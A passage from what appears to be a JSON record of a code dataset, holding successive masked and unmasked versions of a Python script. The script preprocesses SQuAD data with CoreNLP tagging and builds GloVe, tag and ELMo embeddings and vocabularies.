sent.token:\n question_tokens.append(token.word)\n question_pos.append(token.pos)\n question_ner.append(token.ner)\n (all_answer_tokens, all_answer_pos, all_answer_ner,\n all_answer_index) = [], [], [], []\n (all_sent_tokens, all_sent_pos, all_sent_ner,\n all_sent_index) = [], [], [], []\n for answer in qa['answers']:\n answer_text = answer['text']\n if not answer_text.strip():\n continue\n ann_ans = client.annotate(answer_text)\n answer_tokens, answer_pos, answer_ner = [], [], []\n for sent in ann_ans.sentence:\n for token in sent.token:\n answer_tokens.append(token.word)\n answer_pos.append(token.pos)\n answer_ner.append(token.ner)\n all_answer_tokens.append(' '.join(answer_tokens))\n all_answer_pos.append(' '.join(answer_pos))\n all_answer_ner.append(' '.join(answer_ner))\n answer_start = answer['answer_start']\n answer_end = answer_start + len(answer_text)\n sentence = []\n for sent in ann_para.sentence:\n if (sent.characterOffsetBegin <= answer_start <=\n sent.characterOffsetEnd or sent.\n characterOffsetBegin <= answer_end <= sent.\n characterOffsetEnd):\n sentence.append(sent)\n sentence = [token for sent in sentence for token in\n sent.token]\n sentence_tokens = [token.word for token in sentence]\n sentence_pos = [token.pos for token in sentence]\n sentence_ner = [token.ner for token in sentence]\n all_sent_tokens.append(' '.join(sentence_tokens))\n all_sent_pos.append(' '.join(sentence_pos))\n all_sent_ner.append(' '.join(sentence_ner))\n y1_sent = sentence[0].tokenBeginIndex\n y2_sent = sentence[-1].tokenBeginIndex\n y1_ans = None\n for i, token in enumerate(sentence):\n if (token.beginChar - 1 <= answer_start <=\n token.endChar):\n y1_ans = sentence[0].tokenBeginIndex + i\n try:\n assert y1_ans != None\n except:\n continue\n y2_ans = y1_ans + len(answer_tokens) - 1\n all_answer_index.append('{},{}'.format(y1_ans, y2_ans))\n all_sent_index.append('{},{}'.format(y1_sent, y2_sent))\n paragraphs.append(' '.join(paragraph_tokens))\n paragraphs_pos.append(' '.join(paragraph_pos))\n paragraphs_ner.append(' '.join(paragraph_ner))\n questions.append(' '.join(question_tokens))\n questions_pos.append(' '.join(question_pos))\n questions_ner.append(' '.join(question_ner))\n answers.append('\\t'.join(all_answer_tokens))\n answers_pos.append('\\t'.join(all_answer_pos))\n answers_ner.append('\\t'.join(all_answer_ner))\n answers_index.append('\\t'.join(all_answer_index))\n sents.append('\\t'.join(all_sent_tokens))\n sents_pos.append('\\t'.join(all_sent_pos))\n sents_ner.append('\\t'.join(all_sent_ner))\n sents_index.append('\\t'.join(all_sent_index))\n ids.append(id)\n with open('{}.tok'.format(para_file), 'a') as f:\n f.write('\\n'.join(paragraphs) + '\\n')\n with open('{}.pos'.format(para_file), 'a') as f:\n f.write('\\n'.join(paragraphs_pos) + '\\n')\n with open('{}.ner'.format(para_file), 'a') as f:\n f.write('\\n'.join(paragraphs_ner) + '\\n')\n with open('{}.id'.format(para_file), 'a') as f:\n f.write('\\n'.join(ids) + '\\n')\n with open('{}.tok'.format(question_file), 'a') as f:\n f.write('\\n'.join(questions) + '\\n')\n with open('{}.pos'.format(question_file), 'a') as f:\n f.write('\\n'.join(questions_pos) + '\\n')\n with open('{}.ner'.format(question_file), 'a') as f:\n f.write('\\n'.join(questions_ner) + '\\n')\n with open('{}.tok'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers) + '\\n')\n with open('{}.pos'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers_pos) + '\\n')\n with open('{}.ner'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers_ner) + '\\n')\n with open('{}.index'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers_index) + '\\n')\n with open('{}.tok'.format(sent_file), 'a') as f:\n f.write('\\n'.join(sents) + '\\n')\n with open('{}.pos'.format(sent_file), 'a') as f:\n f.write('\\n'.join(sents_pos) + '\\n')\n with open('{}.ner'.format(sent_file), 'a') as f:\n f.write('\\n'.join(sents_ner) + '\\n')\n with open('{}.index'.format(sent_file), 'a') as f:\n f.write('\\n'.join(sents_index) + '\\n')\n label(para_file, answer_file)\n\n\ndef label(para_file, answer_file):\n max_node = 0\n with open('{}.tok'.format(para_file), 'r') as fp, open('{}.label'.\n format(para_file), 'a') as fl, open('{}.index'.format(answer_file), 'r'\n ) as fa:\n while True:\n para = fp.readline()\n if not para:\n break\n words = [p for p in para.strip().split(' ')]\n max_node = max(len(words), max_node)\n answer = fa.readline()\n labels = []\n try:\n start, end = map(int, answer.split('\\t')[0].split(','))\n for i in range(len(words)):\n if start <= i <= end:\n if i == start:\n labels.append('B')\n else:\n labels.append('I')\n else:\n labels.append('O')\n except:\n pass\n fl.write(' '.join(labels) + '\\n')\n return max_node\n\n\ndef get_data(train_json, dev_json, test_title_file, output_dir):\n test_titles = open(test_title_file, 'r').readlines()\n test_titles = set([line.strip() for line in test_titles])\n process(train_json, '{}/train/'.format(output_dir), exclude_titles=\n test_titles)\n process(dev_json, '{}/dev/'.format(output_dir))\n process(train_json, '{}/test/'.format(output_dir), include_titles=\n test_titles)\n\n\ndef get_word_embedding(counter, emb_file, emb_size, vocab_size, vec_size,\n vocab_file):\n \"\"\"\n get word embedding matrix from glove\n \"\"\"\n print('Generating word embedding...')\n embedding_dict = {}\n with open(emb_file, 'r', encoding='utf-8') as fh:\n for line in tqdm(fh, total=emb_size):\n array = line.split()\n word = ''.join(array[0:-vec_size])\n vector = list(map(float, array[-vec_size:]))\n embedding_dict[word] = vector\n TRANSLATE = {'-lsb-': '[', '-rsb-': ']', '-lrb-': '(', '-rrb-': ')',\n '-lcb-': '{', '-rcb-': '}', '-LSB-': '[', '-RSB-': ']', '-LRB-':\n '(', '-RRB-': ')', '-LCB-': '{', '-RCB-': '}'}\n SPECIAL_TOKENS = ['<NULL>', '<UNK>', '<S>', '</S>']\n words = list(map(lambda x: x[0], sorted(counter.items(), key=lambda x:\n x[1], reverse=True)))\n words = SPECIAL_TOKENS + words\n if vocab_size > 0:\n words = words[:vocab_size]\n with open(vocab_file, 'w') as f:\n f.write('\\n'.join(words[1:]))\n embedding = np.random.normal(scale=0.1, size=(len(words), vec_size))\n word2idx_dict = {}\n unknown_count = 0\n for i, word in enumerate(words):\n word2idx_dict[word] = i\n if word in TRANSLATE:\n word = TRANSLATE[word]\n done = False\n for w in (word, word.lower(), word.upper(), word.capitalize()):\n if w in embedding_dict:\n embedding[i] = embedding_dict[w]\n done = True\n break\n if not done:\n unknown_count += 1\n return embedding, word2idx_dict, unknown_count\n\n\ndef get_tag_embedding(counter, data_type, vec_size):\n \"\"\"\n get pos/ner/label tags' embedding matrix\n \"\"\"\n print('Generating {} tag embedding...'.format(data_type))\n SPECIAL_TOKENS = ['<NULL>', '<UNK>']\n tags = list(map(lambda x: x[0], sorted(counter.items(), key=lambda x: x\n [1], reverse=True)))\n tags = SPECIAL_TOKENS + tags\n embedding = np.random.normal(scale=0.1, size=(len(tags), vec_size))\n word2idx_dict = {w: i for i, w in enumerate(tags)}\n return embedding, word2idx_dict\n\n\ndef get_vocab(config):\n print('Get the vocabulary...')\n word_counter, char_counter = Counter(), Counter()\n pos_counter, ner_counter, label_counter = Counter(), Counter(), Counter()\n files = [(config.train_para_file, config.train_question_file), (config.\n dev_para_file, config.dev_question_file)]\n for para_file, que_file in files:\n with open('{}.tok'.format(para_file), 'r') as fp, open('{}.tok'.\n format(que_file), 'r') as fq, open('{}.pos'.format(para_file), 'r'\n ) as fpp, open('{}.pos'.format(que_file), 'r') as fqp, open(\n '{}.ner'.format(para_file), 'r') as fpn, open('{}.ner'.format(\n que_file), 'r') as fqn, open('{}.label'.format(para_file), 'r'\n ) as fpl:\n while True:\n para, question = fp.readline(), fq.readline()\n pos, que_pos = fpp.readline(), fqp.readline()\n ner, que_ner = fpn.readline(), fqn.readline()\n label = fpl.readline()\n if not question or not para:\n break\n if config.lower_word:\n para = para.lower()\n question = question.lower()\n para_tokens = para.strip().split(' ')\n que_tokens = question.strip().split(' ')\n pos_tags = pos.strip().split(' ')\n ner_tags = ner.strip().split(' ')\n que_pos_tags = que_pos.strip().split(' ')\n que_ner_tags = que_ner.strip().split(' ')\n labels = label.strip().split(' ')\n for token in (para_tokens + que_tokens):\n word_counter[token] += 1\n for char in list(token):\n char_counter[char] += 1\n for pos_tag in (pos_tags + que_pos_tags):\n pos_counter[pos_tag] += 1\n for ner_tag in (ner_tags + que_ner_tags):\n ner_counter[ner_tag] += 1\n for label in labels:\n label_counter[label] += 1\n word_emb_mat, word2idx_dict, unk_num = get_word_embedding(word_counter,\n emb_file=config.glove_word_file, emb_size=config.glove_word_size,\n vocab_size=config.vocab_size_limit, vec_size=config.glove_dim,\n vocab_file=config.vocab_file)\n char_emb_mat, char2idx_dict = get_tag_embedding(char_counter, 'char',\n vec_size=config.char_dim)\n pos_emb_mat, pos2idx_dict = get_tag_embedding(pos_counter, 'pos',\n vec_size=config.pos_dim)\n ner_emb_mat, ner2idx_dict = get_tag_embedding(ner_counter, 'ner',\n vec_size=config.ner_dim)\n label_emb_mat, label2idx_dict = get_tag_embedding(label_counter,\n 'label', vec_size=config.label_dim)\n print('{} out of {} are not in glove'.format(unk_num, len(word2idx_dict)))\n print('{} chars'.format(char_emb_mat.shape[0]))\n print('{} pos tags, {} ner tags, {} answer labels, {} chars'.format(\n pos_emb_mat.shape[0], ner_emb_mat.shape[0], label_emb_mat.shape[0],\n char_emb_mat.shape[0]))\n save(config.word_emb_file, word_emb_mat, message='word embedding')\n save(config.char_emb_file, char_emb_mat, message='char embedding')\n save(config.pos_emb_file, pos_emb_mat, message='pos embedding')\n save(config.ner_emb_file, ner_emb_mat, message='ner embedding')\n save(config.label_emb_file, label_emb_mat, message='label embedding')\n save(config.word_dictionary, word2idx_dict, message='word dictionary')\n save(config.char_dictionary, char2idx_dict, message='char dictionary')\n save(config.pos_dictionary, pos2idx_dict, message='pos dictionary')\n save(config.ner_dictionary, ner2idx_dict, message='ner dictionary')\n save(config.label_dictionary, label2idx_dict, message='label dictionary')\n print('Dump elmo word embedding...')\n token_embedding_file = config.embedding_file\n dump_token_embeddings(config.vocab_file, config.elmo_options_file,\n config.elmo_weight_file, token_embedding_file)\n\n\n<mask token>\n",
"step-3": "<mask token>\nsys.path.append('../..')\n<mask token>\n\n\ndef process(json_file, outpur_dir, exclude_titles=None, include_titles=None):\n \"\"\"\n :param json_file: original data in json format\n :param outpur_dir: the output directory of pre-processed data\n :param exclude_titles: article titles to exclude\n :param include_titles: article titles to include\n \"\"\"\n para_file = '{}/paras'.format(outpur_dir)\n question_file = '{}/questions'.format(outpur_dir)\n sent_file = '{}/sents'.format(outpur_dir)\n answer_file = '{}/answers'.format(outpur_dir)\n print('Generating {} raw data...'.format(json_file))\n max_sent, max_sent_len, max_que_len, max_ans_len = 0, 0, 0, 0\n with open(json_file, 'r') as fh, corenlp.CoreNLPClient(annotators=\n 'tokenize ssplit pos ner'.split(), endpoint='http://localhost:9099',\n timeout=50000) as client:\n source = json.load(fh)\n for article in tqdm(source['data']):\n title = article['title']\n if include_titles and title not in include_titles:\n continue\n if exclude_titles and title in exclude_titles:\n continue\n for para in article['paragraphs']:\n paragraphs, questions, answers, sents, ids = [], [], [], [], []\n paragraphs_pos, questions_pos, answers_pos, sents_pos = [], [\n ], [], []\n paragraphs_ner, questions_ner, answers_ner, sents_ner = [], [\n ], [], []\n answers_index, sents_index = [], []\n context = para['context']\n if not context.strip():\n continue\n ann_para = client.annotate(context)\n max_sent = max(max_sent, len(ann_para.sentence))\n max_sent_len = max(max_sent_len, max(map(lambda x: len(x.\n token), ann_para.sentence)))\n (ann_para_tokens, paragraph_tokens, paragraph_pos,\n paragraph_ner) = [], [], [], []\n for sent in ann_para.sentence:\n for token in sent.token:\n ann_para_tokens.append(token)\n paragraph_tokens.append(token.word)\n paragraph_pos.append(token.pos)\n paragraph_ner.append(token.ner)\n for qa in para['qas']:\n ques = qa['question']\n id = qa['id']\n if not ques.strip():\n continue\n ann_que = client.annotate(ques)\n max_que_len = max(max_que_len, len(ann_que.sentence[0].\n token))\n question_tokens, question_pos, question_ner = [], [], []\n for sent in ann_que.sentence:\n for token in sent.token:\n question_tokens.append(token.word)\n question_pos.append(token.pos)\n question_ner.append(token.ner)\n (all_answer_tokens, all_answer_pos, all_answer_ner,\n all_answer_index) = [], [], [], []\n (all_sent_tokens, all_sent_pos, all_sent_ner,\n all_sent_index) = [], [], [], []\n for answer in qa['answers']:\n answer_text = answer['text']\n if not answer_text.strip():\n continue\n ann_ans = client.annotate(answer_text)\n answer_tokens, answer_pos, answer_ner = [], [], []\n for sent in ann_ans.sentence:\n for token in sent.token:\n answer_tokens.append(token.word)\n answer_pos.append(token.pos)\n answer_ner.append(token.ner)\n all_answer_tokens.append(' '.join(answer_tokens))\n all_answer_pos.append(' '.join(answer_pos))\n all_answer_ner.append(' '.join(answer_ner))\n answer_start = answer['answer_start']\n answer_end = answer_start + len(answer_text)\n sentence = []\n for sent in ann_para.sentence:\n if (sent.characterOffsetBegin <= answer_start <=\n sent.characterOffsetEnd or sent.\n characterOffsetBegin <= answer_end <= sent.\n characterOffsetEnd):\n sentence.append(sent)\n sentence = [token for sent in sentence for token in\n sent.token]\n sentence_tokens = [token.word for token in sentence]\n sentence_pos = [token.pos for token in sentence]\n sentence_ner = [token.ner for token in sentence]\n all_sent_tokens.append(' '.join(sentence_tokens))\n all_sent_pos.append(' '.join(sentence_pos))\n all_sent_ner.append(' '.join(sentence_ner))\n y1_sent = sentence[0].tokenBeginIndex\n y2_sent = sentence[-1].tokenBeginIndex\n y1_ans = None\n for i, token in enumerate(sentence):\n if (token.beginChar - 1 <= answer_start <=\n token.endChar):\n y1_ans = sentence[0].tokenBeginIndex + i\n try:\n assert y1_ans != None\n except:\n continue\n y2_ans = y1_ans + len(answer_tokens) - 1\n all_answer_index.append('{},{}'.format(y1_ans, y2_ans))\n all_sent_index.append('{},{}'.format(y1_sent, y2_sent))\n paragraphs.append(' '.join(paragraph_tokens))\n paragraphs_pos.append(' '.join(paragraph_pos))\n paragraphs_ner.append(' '.join(paragraph_ner))\n questions.append(' '.join(question_tokens))\n questions_pos.append(' '.join(question_pos))\n questions_ner.append(' '.join(question_ner))\n answers.append('\\t'.join(all_answer_tokens))\n answers_pos.append('\\t'.join(all_answer_pos))\n answers_ner.append('\\t'.join(all_answer_ner))\n answers_index.append('\\t'.join(all_answer_index))\n sents.append('\\t'.join(all_sent_tokens))\n sents_pos.append('\\t'.join(all_sent_pos))\n sents_ner.append('\\t'.join(all_sent_ner))\n sents_index.append('\\t'.join(all_sent_index))\n ids.append(id)\n with open('{}.tok'.format(para_file), 'a') as f:\n f.write('\\n'.join(paragraphs) + '\\n')\n with open('{}.pos'.format(para_file), 'a') as f:\n f.write('\\n'.join(paragraphs_pos) + '\\n')\n with open('{}.ner'.format(para_file), 'a') as f:\n f.write('\\n'.join(paragraphs_ner) + '\\n')\n with open('{}.id'.format(para_file), 'a') as f:\n f.write('\\n'.join(ids) + '\\n')\n with open('{}.tok'.format(question_file), 'a') as f:\n f.write('\\n'.join(questions) + '\\n')\n with open('{}.pos'.format(question_file), 'a') as f:\n f.write('\\n'.join(questions_pos) + '\\n')\n with open('{}.ner'.format(question_file), 'a') as f:\n f.write('\\n'.join(questions_ner) + '\\n')\n with open('{}.tok'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers) + '\\n')\n with open('{}.pos'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers_pos) + '\\n')\n with open('{}.ner'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers_ner) + '\\n')\n with open('{}.index'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers_index) + '\\n')\n with open('{}.tok'.format(sent_file), 'a') as f:\n f.write('\\n'.join(sents) + '\\n')\n with open('{}.pos'.format(sent_file), 'a') as f:\n f.write('\\n'.join(sents_pos) + '\\n')\n with open('{}.ner'.format(sent_file), 'a') as f:\n f.write('\\n'.join(sents_ner) + '\\n')\n with open('{}.index'.format(sent_file), 'a') as f:\n f.write('\\n'.join(sents_index) + '\\n')\n label(para_file, answer_file)\n\n\ndef label(para_file, answer_file):\n max_node = 0\n with open('{}.tok'.format(para_file), 'r') as fp, open('{}.label'.\n format(para_file), 'a') as fl, open('{}.index'.format(answer_file), 'r'\n ) as fa:\n while True:\n para = fp.readline()\n if not para:\n break\n words = [p for p in para.strip().split(' ')]\n max_node = max(len(words), max_node)\n answer = fa.readline()\n labels = []\n try:\n start, end = map(int, answer.split('\\t')[0].split(','))\n for i in range(len(words)):\n if start <= i <= end:\n if i == start:\n labels.append('B')\n else:\n labels.append('I')\n else:\n labels.append('O')\n except:\n pass\n fl.write(' '.join(labels) + '\\n')\n return max_node\n\n\ndef get_data(train_json, dev_json, test_title_file, output_dir):\n test_titles = open(test_title_file, 'r').readlines()\n test_titles = set([line.strip() for line in test_titles])\n process(train_json, '{}/train/'.format(output_dir), exclude_titles=\n test_titles)\n process(dev_json, '{}/dev/'.format(output_dir))\n process(train_json, '{}/test/'.format(output_dir), include_titles=\n test_titles)\n\n\ndef get_word_embedding(counter, emb_file, emb_size, vocab_size, vec_size,\n vocab_file):\n \"\"\"\n get word embedding matrix from glove\n \"\"\"\n print('Generating word embedding...')\n embedding_dict = {}\n with open(emb_file, 'r', encoding='utf-8') as fh:\n for line in tqdm(fh, total=emb_size):\n array = line.split()\n word = ''.join(array[0:-vec_size])\n vector = list(map(float, array[-vec_size:]))\n embedding_dict[word] = vector\n TRANSLATE = {'-lsb-': '[', '-rsb-': ']', '-lrb-': '(', '-rrb-': ')',\n '-lcb-': '{', '-rcb-': '}', '-LSB-': '[', '-RSB-': ']', '-LRB-':\n '(', '-RRB-': ')', '-LCB-': '{', '-RCB-': '}'}\n SPECIAL_TOKENS = ['<NULL>', '<UNK>', '<S>', '</S>']\n words = list(map(lambda x: x[0], sorted(counter.items(), key=lambda x:\n x[1], reverse=True)))\n words = SPECIAL_TOKENS + words\n if vocab_size > 0:\n words = words[:vocab_size]\n with open(vocab_file, 'w') as f:\n f.write('\\n'.join(words[1:]))\n embedding = np.random.normal(scale=0.1, size=(len(words), vec_size))\n word2idx_dict = {}\n unknown_count = 0\n for i, word in enumerate(words):\n word2idx_dict[word] = i\n if word in TRANSLATE:\n word = TRANSLATE[word]\n done = False\n for w in (word, word.lower(), word.upper(), word.capitalize()):\n if w in embedding_dict:\n embedding[i] = embedding_dict[w]\n done = True\n break\n if not done:\n unknown_count += 1\n return embedding, word2idx_dict, unknown_count\n\n\ndef get_tag_embedding(counter, data_type, vec_size):\n \"\"\"\n get pos/ner/label tags' embedding matrix\n \"\"\"\n print('Generating {} tag embedding...'.format(data_type))\n SPECIAL_TOKENS = ['<NULL>', '<UNK>']\n tags = list(map(lambda x: x[0], sorted(counter.items(), key=lambda x: x\n [1], reverse=True)))\n tags = SPECIAL_TOKENS + tags\n embedding = np.random.normal(scale=0.1, size=(len(tags), vec_size))\n word2idx_dict = {w: i for i, w in enumerate(tags)}\n return embedding, word2idx_dict\n\n\ndef get_vocab(config):\n print('Get the vocabulary...')\n word_counter, char_counter = Counter(), Counter()\n pos_counter, ner_counter, label_counter = Counter(), Counter(), Counter()\n files = [(config.train_para_file, config.train_question_file), (config.\n dev_para_file, config.dev_question_file)]\n for para_file, que_file in files:\n with open('{}.tok'.format(para_file), 'r') as fp, open('{}.tok'.\n format(que_file), 'r') as fq, open('{}.pos'.format(para_file), 'r'\n ) as fpp, open('{}.pos'.format(que_file), 'r') as fqp, open(\n '{}.ner'.format(para_file), 'r') as fpn, open('{}.ner'.format(\n que_file), 'r') as fqn, open('{}.label'.format(para_file), 'r'\n ) as fpl:\n while True:\n para, question = fp.readline(), fq.readline()\n pos, que_pos = fpp.readline(), fqp.readline()\n ner, que_ner = fpn.readline(), fqn.readline()\n label = fpl.readline()\n if not question or not para:\n break\n if config.lower_word:\n para = para.lower()\n question = question.lower()\n para_tokens = para.strip().split(' ')\n que_tokens = question.strip().split(' ')\n pos_tags = pos.strip().split(' ')\n ner_tags = ner.strip().split(' ')\n que_pos_tags = que_pos.strip().split(' ')\n que_ner_tags = que_ner.strip().split(' ')\n labels = label.strip().split(' ')\n for token in (para_tokens + que_tokens):\n word_counter[token] += 1\n for char in list(token):\n char_counter[char] += 1\n for pos_tag in (pos_tags + que_pos_tags):\n pos_counter[pos_tag] += 1\n for ner_tag in (ner_tags + que_ner_tags):\n ner_counter[ner_tag] += 1\n for label in labels:\n label_counter[label] += 1\n word_emb_mat, word2idx_dict, unk_num = get_word_embedding(word_counter,\n emb_file=config.glove_word_file, emb_size=config.glove_word_size,\n vocab_size=config.vocab_size_limit, vec_size=config.glove_dim,\n vocab_file=config.vocab_file)\n char_emb_mat, char2idx_dict = get_tag_embedding(char_counter, 'char',\n vec_size=config.char_dim)\n pos_emb_mat, pos2idx_dict = get_tag_embedding(pos_counter, 'pos',\n vec_size=config.pos_dim)\n ner_emb_mat, ner2idx_dict = get_tag_embedding(ner_counter, 'ner',\n vec_size=config.ner_dim)\n label_emb_mat, label2idx_dict = get_tag_embedding(label_counter,\n 'label', vec_size=config.label_dim)\n print('{} out of {} are not in glove'.format(unk_num, len(word2idx_dict)))\n print('{} chars'.format(char_emb_mat.shape[0]))\n print('{} pos tags, {} ner tags, {} answer labels, {} chars'.format(\n pos_emb_mat.shape[0], ner_emb_mat.shape[0], label_emb_mat.shape[0],\n char_emb_mat.shape[0]))\n save(config.word_emb_file, word_emb_mat, message='word embedding')\n save(config.char_emb_file, char_emb_mat, message='char embedding')\n save(config.pos_emb_file, pos_emb_mat, message='pos embedding')\n save(config.ner_emb_file, ner_emb_mat, message='ner embedding')\n save(config.label_emb_file, label_emb_mat, message='label embedding')\n save(config.word_dictionary, word2idx_dict, message='word dictionary')\n save(config.char_dictionary, char2idx_dict, message='char dictionary')\n save(config.pos_dictionary, pos2idx_dict, message='pos dictionary')\n save(config.ner_dictionary, ner2idx_dict, message='ner dictionary')\n save(config.label_dictionary, label2idx_dict, message='label dictionary')\n print('Dump elmo word embedding...')\n token_embedding_file = config.embedding_file\n dump_token_embeddings(config.vocab_file, config.elmo_options_file,\n config.elmo_weight_file, token_embedding_file)\n\n\nif __name__ == '__main__':\n os.system(\n 'mkdir data; mkdir data/processed; mkdir data/processed/train; mkdir data/processed/dev; mkdir data/processed/test'\n )\n get_data('../../LIB/squad/train-v1.1.json',\n '../../LIB/squad/dev-v1.1.json', '../../LIB/squad/doclist-test.txt',\n 'data/processed')\n",
"step-4": "<mask token>\nimport os\nimport corenlp\nimport numpy as np\nimport ujson as json\nfrom tqdm import tqdm\nfrom collections import Counter\nfrom bilm import dump_token_embeddings\nimport sys\nsys.path.append('../..')\nfrom LIB.utils import save\n\n\ndef process(json_file, outpur_dir, exclude_titles=None, include_titles=None):\n \"\"\"\n :param json_file: original data in json format\n :param outpur_dir: the output directory of pre-processed data\n :param exclude_titles: article titles to exclude\n :param include_titles: article titles to include\n \"\"\"\n para_file = '{}/paras'.format(outpur_dir)\n question_file = '{}/questions'.format(outpur_dir)\n sent_file = '{}/sents'.format(outpur_dir)\n answer_file = '{}/answers'.format(outpur_dir)\n print('Generating {} raw data...'.format(json_file))\n max_sent, max_sent_len, max_que_len, max_ans_len = 0, 0, 0, 0\n with open(json_file, 'r') as fh, corenlp.CoreNLPClient(annotators=\n 'tokenize ssplit pos ner'.split(), endpoint='http://localhost:9099',\n timeout=50000) as client:\n source = json.load(fh)\n for article in tqdm(source['data']):\n title = article['title']\n if include_titles and title not in include_titles:\n continue\n if exclude_titles and title in exclude_titles:\n continue\n for para in article['paragraphs']:\n paragraphs, questions, answers, sents, ids = [], [], [], [], []\n paragraphs_pos, questions_pos, answers_pos, sents_pos = [], [\n ], [], []\n paragraphs_ner, questions_ner, answers_ner, sents_ner = [], [\n ], [], []\n answers_index, sents_index = [], []\n context = para['context']\n if not context.strip():\n continue\n ann_para = client.annotate(context)\n max_sent = max(max_sent, len(ann_para.sentence))\n max_sent_len = max(max_sent_len, max(map(lambda x: len(x.\n token), ann_para.sentence)))\n (ann_para_tokens, paragraph_tokens, paragraph_pos,\n paragraph_ner) = [], [], [], []\n for sent in ann_para.sentence:\n for token in sent.token:\n ann_para_tokens.append(token)\n paragraph_tokens.append(token.word)\n paragraph_pos.append(token.pos)\n paragraph_ner.append(token.ner)\n for qa in para['qas']:\n ques = qa['question']\n id = qa['id']\n if not ques.strip():\n continue\n ann_que = client.annotate(ques)\n max_que_len = max(max_que_len, len(ann_que.sentence[0].\n token))\n question_tokens, question_pos, question_ner = [], [], []\n for sent in ann_que.sentence:\n for token in sent.token:\n question_tokens.append(token.word)\n question_pos.append(token.pos)\n question_ner.append(token.ner)\n (all_answer_tokens, all_answer_pos, all_answer_ner,\n all_answer_index) = [], [], [], []\n (all_sent_tokens, all_sent_pos, all_sent_ner,\n all_sent_index) = [], [], [], []\n for answer in qa['answers']:\n answer_text = answer['text']\n if not answer_text.strip():\n continue\n ann_ans = client.annotate(answer_text)\n answer_tokens, answer_pos, answer_ner = [], [], []\n for sent in ann_ans.sentence:\n for token in sent.token:\n answer_tokens.append(token.word)\n answer_pos.append(token.pos)\n answer_ner.append(token.ner)\n all_answer_tokens.append(' '.join(answer_tokens))\n all_answer_pos.append(' '.join(answer_pos))\n all_answer_ner.append(' '.join(answer_ner))\n answer_start = answer['answer_start']\n answer_end = answer_start + len(answer_text)\n sentence = []\n for sent in ann_para.sentence:\n if (sent.characterOffsetBegin <= answer_start <=\n sent.characterOffsetEnd or sent.\n characterOffsetBegin <= answer_end <= sent.\n characterOffsetEnd):\n sentence.append(sent)\n sentence = [token for sent in sentence for token in\n sent.token]\n sentence_tokens = [token.word for token in sentence]\n sentence_pos = [token.pos for token in sentence]\n sentence_ner = [token.ner for token in sentence]\n all_sent_tokens.append(' '.join(sentence_tokens))\n all_sent_pos.append(' '.join(sentence_pos))\n all_sent_ner.append(' '.join(sentence_ner))\n y1_sent = sentence[0].tokenBeginIndex\n y2_sent = sentence[-1].tokenBeginIndex\n y1_ans = None\n for i, token in enumerate(sentence):\n if (token.beginChar - 1 <= answer_start <=\n token.endChar):\n y1_ans = sentence[0].tokenBeginIndex + i\n try:\n assert y1_ans != None\n except:\n continue\n y2_ans = y1_ans + len(answer_tokens) - 1\n all_answer_index.append('{},{}'.format(y1_ans, y2_ans))\n all_sent_index.append('{},{}'.format(y1_sent, y2_sent))\n paragraphs.append(' '.join(paragraph_tokens))\n paragraphs_pos.append(' '.join(paragraph_pos))\n paragraphs_ner.append(' '.join(paragraph_ner))\n questions.append(' '.join(question_tokens))\n questions_pos.append(' '.join(question_pos))\n questions_ner.append(' '.join(question_ner))\n answers.append('\\t'.join(all_answer_tokens))\n answers_pos.append('\\t'.join(all_answer_pos))\n answers_ner.append('\\t'.join(all_answer_ner))\n answers_index.append('\\t'.join(all_answer_index))\n sents.append('\\t'.join(all_sent_tokens))\n sents_pos.append('\\t'.join(all_sent_pos))\n sents_ner.append('\\t'.join(all_sent_ner))\n sents_index.append('\\t'.join(all_sent_index))\n ids.append(id)\n with open('{}.tok'.format(para_file), 'a') as f:\n f.write('\\n'.join(paragraphs) + '\\n')\n with open('{}.pos'.format(para_file), 'a') as f:\n f.write('\\n'.join(paragraphs_pos) + '\\n')\n with open('{}.ner'.format(para_file), 'a') as f:\n f.write('\\n'.join(paragraphs_ner) + '\\n')\n with open('{}.id'.format(para_file), 'a') as f:\n f.write('\\n'.join(ids) + '\\n')\n with open('{}.tok'.format(question_file), 'a') as f:\n f.write('\\n'.join(questions) + '\\n')\n with open('{}.pos'.format(question_file), 'a') as f:\n f.write('\\n'.join(questions_pos) + '\\n')\n with open('{}.ner'.format(question_file), 'a') as f:\n f.write('\\n'.join(questions_ner) + '\\n')\n with open('{}.tok'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers) + '\\n')\n with open('{}.pos'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers_pos) + '\\n')\n with open('{}.ner'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers_ner) + '\\n')\n with open('{}.index'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers_index) + '\\n')\n with open('{}.tok'.format(sent_file), 'a') as f:\n f.write('\\n'.join(sents) + '\\n')\n with open('{}.pos'.format(sent_file), 'a') as f:\n f.write('\\n'.join(sents_pos) + '\\n')\n with open('{}.ner'.format(sent_file), 'a') as f:\n f.write('\\n'.join(sents_ner) + '\\n')\n with open('{}.index'.format(sent_file), 'a') as f:\n f.write('\\n'.join(sents_index) + '\\n')\n label(para_file, answer_file)\n\n\ndef label(para_file, answer_file):\n max_node = 0\n with open('{}.tok'.format(para_file), 'r') as fp, open('{}.label'.\n format(para_file), 'a') as fl, open('{}.index'.format(answer_file), 'r'\n ) as fa:\n while True:\n para = fp.readline()\n if not para:\n break\n words = [p for p in para.strip().split(' ')]\n max_node = max(len(words), max_node)\n answer = fa.readline()\n labels = []\n try:\n start, end = map(int, answer.split('\\t')[0].split(','))\n for i in range(len(words)):\n if start <= i <= end:\n if i == start:\n labels.append('B')\n else:\n labels.append('I')\n else:\n labels.append('O')\n except:\n pass\n fl.write(' '.join(labels) + '\\n')\n return max_node\n\n\ndef get_data(train_json, dev_json, test_title_file, output_dir):\n test_titles = open(test_title_file, 'r').readlines()\n test_titles = set([line.strip() for line in test_titles])\n process(train_json, '{}/train/'.format(output_dir), exclude_titles=\n test_titles)\n process(dev_json, '{}/dev/'.format(output_dir))\n process(train_json, '{}/test/'.format(output_dir), include_titles=\n test_titles)\n\n\ndef get_word_embedding(counter, emb_file, emb_size, vocab_size, vec_size,\n vocab_file):\n \"\"\"\n get word embedding matrix from glove\n \"\"\"\n print('Generating word embedding...')\n embedding_dict = {}\n with open(emb_file, 'r', encoding='utf-8') as fh:\n for line in tqdm(fh, total=emb_size):\n array 